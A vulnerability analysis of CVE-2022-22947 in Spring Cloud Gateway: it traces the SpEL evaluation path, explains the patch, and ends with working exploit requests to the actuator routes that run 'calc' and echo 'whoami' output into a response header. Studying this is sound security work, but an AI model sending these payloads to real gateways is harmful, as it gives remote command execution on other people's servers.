spring-cloud-gateway_spel_CVE-2022-22947

1. SSRF: https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/

2. SpEL: https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/

Affected versions:

  • 3.1.0
  • 3.0.0 to 3.0.6
  • Older, unsupported versions are also affected

The patch is at https://github.com/spring-cloud/spring-cloud-gateway/commit/337cef276bfd8c59fb421bfe7377a9e19c68fe1e

In the diff you can see that org/springframework/cloud/gateway/support/ShortcutConfigurable.java replaces the StandardEvaluationContext that was used for expression evaluation.

ShortcutConfigurable.getValue

Here the entryValue parameter is parsed and evaluated as a SpEL expression.
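To make the patch's point concrete, here is a small added example (my own code, not from the page or from the Spring Cloud Gateway project) that evaluates two expressions once with a permissive StandardEvaluationContext, as the pre-patch getValue did, and once with Spring's restricted SimpleEvaluationContext, which is the kind of context the fix moves to. The gateway wraps values in a #{...} template before parsing; that wrapper is omitted here, and the type-reference expression deliberately reads a harmless system property so the contrast is visible without running anything. The class and method names are my own.

```java
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.EvaluationException;
import org.springframework.expression.Expression;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;

/**
 * Added example (not project code): shows why swapping the evaluation context
 * matters for values that arrive in a route definition's "args".
 */
public class SpelContextDemo {

    // Same shape as the #{...} values the gateway evaluates: a T(...) type
    // reference followed by a static method call. Benign on purpose.
    static final String TYPE_REFERENCE_EXPR = "T(java.lang.System).getProperty('java.version')";

    // A plain data-binding expression, the only kind a route arg legitimately needs.
    static final String DATA_BINDING_EXPR = "'prefix-' + 'value'";

    /** Parses and evaluates one expression under the given context. */
    static Object evaluate(EvaluationContext ctx, String expr) {
        Expression e = new SpelExpressionParser().parseExpression(expr);
        return e.getValue(ctx);
    }

    /** Reports the outcome instead of propagating, so both contexts can be compared side by side. */
    static String tryEvaluate(String label, EvaluationContext ctx, String expr) {
        try {
            return label + ": OK -> " + evaluate(ctx, expr);
        } catch (EvaluationException ex) {
            return label + ": REJECTED (" + ex.getMessage() + ")";
        }
    }

    public static void main(String[] args) {
        // Pre-patch behaviour: StandardEvaluationContext resolves T(...) types,
        // so any static method on the classpath is reachable from a route arg.
        EvaluationContext permissive = new StandardEvaluationContext();

        // Restricted context: SimpleEvaluationContext has no TypeLocator, so a
        // T(...) reference fails at evaluation time; simple data binding still works.
        EvaluationContext restricted = SimpleEvaluationContext.forReadOnlyDataBinding().build();

        System.out.println(tryEvaluate("standard / type ref", permissive, TYPE_REFERENCE_EXPR));
        System.out.println(tryEvaluate("simple   / type ref", restricted, TYPE_REFERENCE_EXPR));
        System.out.println(tryEvaluate("standard / data    ", permissive, DATA_BINDING_EXPR));
        System.out.println(tryEvaluate("simple   / data    ", restricted, DATA_BINDING_EXPR));
    }
}
```

Run with spring-expression on the classpath. The first line evaluates the type reference successfully; the second is rejected with a SpEL evaluation error because the restricted context cannot resolve types; the last two lines show that ordinary string expressions still evaluate under both, which is why the restricted context is a workable replacement for route-arg evaluation.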

Tracing upward, this is called from the DEFAULT constant of the ShortcutType enum inside ShortcutConfigurable.

ShortcutConfigurable.ShortcutType


ConfigurationService$ConfigurableBuilder.normalizeProperties


ConfigurationService$AbstractBuilder.bind

At this point, look at the ShortcutConfigurable class itself: it has many FilterFactory implementations.

The documentation at https://cloud.spring.io/spring-cloud-gateway/multi/multi__actuator_api.html explains that these FilterFactory classes are route filters.

RouteDefinitionRouteLocator.loadGatewayFilters looks up the matching FilterFactory by the name given in the filterDefinitions parameter,

and then calls its bind method, which leads into the call chain above.

Going further up, filterDefinitions is taken from routeDefinitions, that is, from the route definitions themselves.

Ultimately this traces back to the /refresh route.

So the sequence is: first add a route whose filter args contain a SpEL expression, then refresh the routes; the gateway locates the corresponding FilterFactory from the stored route definition, calls its bind method, and finally the expression is evaluated.

POST /actuator/gateway/routes/new_route HTTP/1.1
Host: 127.0.0.1:9000
Connection: close
Content-Type: application/json

{
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/new_route/**"
      }
    }
  ],
  "filters": [
    {
      "name": "RewritePath",
      "args": {
        "_genkey_0": "#{T(java.lang.Runtime).getRuntime().exec(\"calc\")}",
        "_genkey_1": "/${path}"
      }
    }
  ],
  "uri": "https://wya.pl",
  "order": 0
}

POST /actuator/gateway/refresh HTTP/1.1
Host: 127.0.0.1:9000
Content-Type: application/json
Connection: close

Echoing the result: using AddResponseHeaderFilterFactory, the evaluated args are written into the response:

POST /actuator/gateway/routes/test HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 300
Content-Type: application/json
Connection: close

{
    "id": "test",
    "filters": [
        {
            "name": "AddResponseHeader",
            "args": {
                "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}",
                "name": "ddd"
            }
        }
    ],
    "uri": "http://test.com",
    "order": 0
}

https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/README.zh-cn.md
https://y4er.com/post/cve-2022-22947-springcloud-gateway-spel-rce-echo-response/
